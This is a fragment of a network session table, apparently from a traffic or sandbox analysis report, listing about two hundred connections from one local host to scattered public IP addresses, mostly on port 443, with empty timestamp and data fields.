                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11395192.168.2.144386466.223.168.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11396192.168.2.1453212199.136.189.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11397192.168.2.1449492100.214.15.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11398192.168.2.144122020.235.40.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11399192.168.2.143844077.149.182.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11400192.168.2.1439202137.8.195.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11401192.168.2.1457950111.17.126.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11402192.168.2.1455838191.136.172.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11403192.168.2.1457156147.108.114.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11404192.168.2.1440970128.237.147.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11405192.168.2.1459066211.188.237.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11406192.168.2.143739878.161.200.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11407192.168.2.1445676135.228.166.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11408192.168.2.1449446175.168.52.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11409192.168.2.1459964108.133.15.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11410192.168.2.1448992180.157.229.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11411192.168.2.1458340197.95.61.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11412192.168.2.143752678.177.100.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11413192.168.2.144062890.86.112.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11414192.168.2.146004657.131.63.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11415192.168.2.145929475.183.224.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11416192.168.2.1448606217.94.122.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11417192.168.2.1460120132.114.13.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11418192.168.2.144727834.160.100.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11419192.168.2.144058242.194.75.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11420192.168.2.1447988137.180.103.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11421192.168.2.1433214141.53.41.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11422192.168.2.1453064176.222.164.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11423192.168.2.1452180125.174.123.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11424192.168.2.145611059.33.147.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11425192.168.2.1435598155.108.158.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11426192.168.2.1455354210.225.58.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11427192.168.2.143681093.224.172.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11428192.168.2.1457370100.134.212.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11429192.168.2.1438068135.95.1.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11430192.168.2.1459060125.40.204.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11431192.168.2.1440784200.11.205.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11432192.168.2.14443682.219.157.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11433192.168.2.1452830123.230.22.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11434192.168.2.1441956167.73.88.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11435192.168.2.1439912114.79.200.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11436192.168.2.1459404134.35.104.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11437192.168.2.1448944182.193.88.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11438192.168.2.144091892.177.242.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11439192.168.2.1453146135.234.186.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11440192.168.2.145300291.87.49.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11441192.168.2.1436160134.116.57.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11442192.168.2.1448494219.84.87.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11443192.168.2.1452476159.17.204.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11444192.168.2.144212227.224.164.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11445192.168.2.1441734173.187.97.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11446192.168.2.143681867.50.218.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11447192.168.2.1445854153.152.125.7443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11448192.168.2.143855282.33.188.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11449192.168.2.1437922143.23.92.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11450192.168.2.14582084.206.145.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11451192.168.2.144461438.166.203.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11452192.168.2.1449564178.56.142.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11453192.168.2.144450436.230.47.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11454192.168.2.1435826175.7.91.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11455192.168.2.145327062.70.129.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11456192.168.2.1443930187.42.229.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11457192.168.2.1451824152.116.216.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11458192.168.2.144573896.181.108.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11459192.168.2.144232091.173.11.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11460192.168.2.1441346190.106.121.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11461192.168.2.1437656148.135.57.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11462192.168.2.145754465.197.158.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11463192.168.2.145458248.111.35.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11464192.168.2.1445052135.60.13.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11465192.168.2.1442270116.74.59.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11466192.168.2.1437962144.4.238.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11467192.168.2.1450156189.88.71.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11468192.168.2.144230099.44.119.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11469192.168.2.1442664149.90.132.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11470192.168.2.1438716188.228.210.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11471192.168.2.1435214112.196.71.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11472192.168.2.1459460205.231.236.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11473192.168.2.1451188125.110.120.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11474192.168.2.1442778142.234.118.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11475192.168.2.1444196190.170.0.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11476192.168.2.145583238.125.14.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11477192.168.2.145268442.134.130.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11478192.168.2.1448572187.171.73.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11479192.168.2.144745225.135.121.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11480192.168.2.1459174167.247.13.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11481192.168.2.1444420129.69.244.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11482192.168.2.143537460.103.245.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11483192.168.2.1452162162.9.179.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11484192.168.2.1448508136.204.171.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11485192.168.2.1458622143.103.218.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11486192.168.2.1434568170.70.242.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11487192.168.2.1435808220.152.114.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11488192.168.2.146013825.17.89.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11489192.168.2.1443106117.189.217.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11490192.168.2.1450230170.46.58.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11491192.168.2.14358602.111.106.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11492192.168.2.144703875.179.191.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11493192.168.2.1458454207.103.236.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11494192.168.2.1435318134.205.124.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11495192.168.2.143344838.119.30.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11496192.168.2.1449552222.154.84.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11497192.168.2.1443206119.131.223.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11498192.168.2.1458562186.176.138.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11499192.168.2.1455614113.110.134.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11500192.168.2.145549475.167.148.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11501192.168.2.1439236174.193.253.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11502192.168.2.143291218.101.23.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11503192.168.2.1446820123.51.96.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11504192.168.2.1434380167.119.33.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11505192.168.2.144056239.113.105.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11506192.168.2.1448490147.141.56.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11507192.168.2.143506024.104.191.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11508192.168.2.1458686219.109.184.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11509192.168.2.1455036165.83.87.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11510192.168.2.1455812195.116.210.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11511192.168.2.144465497.141.113.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11512192.168.2.144537697.173.232.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11513192.168.2.1442688121.193.123.75443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11514192.168.2.1440826175.188.118.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11515192.168.2.144923488.201.253.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11516192.168.2.1457014151.97.236.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11517192.168.2.144252675.86.108.17443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11518192.168.2.1452004144.6.238.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11519192.168.2.144907068.30.160.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11520192.168.2.1445150153.202.163.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11521192.168.2.145943673.135.27.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11522192.168.2.145531644.155.179.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11523192.168.2.144555841.253.56.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11524192.168.2.144990239.191.80.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11525192.168.2.1448394122.243.123.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11526192.168.2.1457456216.65.168.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11527192.168.2.144409264.99.163.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11528192.168.2.1447638162.183.110.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11529192.168.2.1454310219.36.162.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11530192.168.2.144213044.63.253.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11531192.168.2.1442660168.0.59.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11532192.168.2.145936684.100.246.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11533192.168.2.1460062110.222.237.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11534192.168.2.1436706206.246.188.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11535192.168.2.144061454.120.231.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11536192.168.2.144826870.121.66.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11537192.168.2.143495642.111.206.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11538192.168.2.145840841.201.173.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11539192.168.2.145860078.99.97.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11540192.168.2.145323675.184.144.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11541192.168.2.145506436.7.71.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11542192.168.2.1440136211.49.68.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11543192.168.2.144977062.121.87.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11544192.168.2.145046671.203.134.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11545192.168.2.144388083.211.39.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11546192.168.2.144436653.38.128.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11547192.168.2.144716295.23.244.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11548192.168.2.1443328162.161.161.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11549192.168.2.1454216198.107.170.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11550192.168.2.144028414.3.191.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11551192.168.2.1439598201.120.26.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11552192.168.2.1433316126.60.188.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11553192.168.2.1448392200.101.63.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11554192.168.2.143683672.158.158.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11555192.168.2.144009827.212.228.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11556192.168.2.1435902100.216.78.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11557192.168.2.1443778205.198.105.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11558192.168.2.1446068172.175.137.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11559192.168.2.1453454219.77.73.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11560192.168.2.1460584104.162.188.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11561192.168.2.1454922149.161.202.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11562192.168.2.144444671.6.53.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11563192.168.2.1445566125.159.65.133443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11564192.168.2.1457218157.117.189.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11565192.168.2.1448232126.8.166.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11566192.168.2.143892661.85.47.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11567192.168.2.1452202176.104.54.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11568192.168.2.145059214.130.65.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11569192.168.2.14510824.75.6.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11570192.168.2.1451834212.195.231.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11571192.168.2.1450436107.159.233.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11572192.168.2.143285667.141.163.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11573192.168.2.145395024.3.70.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11574192.168.2.1444704209.0.79.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11575192.168.2.1455708147.245.88.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11576192.168.2.144193825.210.32.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11577192.168.2.1460148141.52.133.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11578192.168.2.1448160183.178.74.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11579192.168.2.1440844190.234.148.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11580192.168.2.1446152176.70.172.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11581192.168.2.145604257.193.133.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11582192.168.2.1451386167.238.32.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11583192.168.2.1438518145.135.209.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11584192.168.2.1440684117.250.215.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11585192.168.2.1452934218.138.232.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11586192.168.2.1442292208.204.114.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11587192.168.2.145510614.21.116.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11588192.168.2.1442884168.212.227.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11589192.168.2.145836045.97.212.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11590192.168.2.144290457.195.67.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11591192.168.2.144377667.222.207.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11592192.168.2.1458140205.49.230.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11593192.168.2.1445816107.118.223.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11594192.168.2.1435428124.64.231.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11595192.168.2.1435842223.174.137.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11596192.168.2.1447998184.13.179.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11597192.168.2.143963078.20.181.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11598192.168.2.1442296222.125.112.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11599192.168.2.144635497.154.206.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11600192.168.2.14559744.37.188.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11601192.168.2.1454238100.154.45.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11602192.168.2.1435798163.201.247.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11603192.168.2.1459208110.20.186.95443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11604192.168.2.1458436184.85.237.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11605192.168.2.143391035.12.202.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11606192.168.2.1459540124.219.139.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
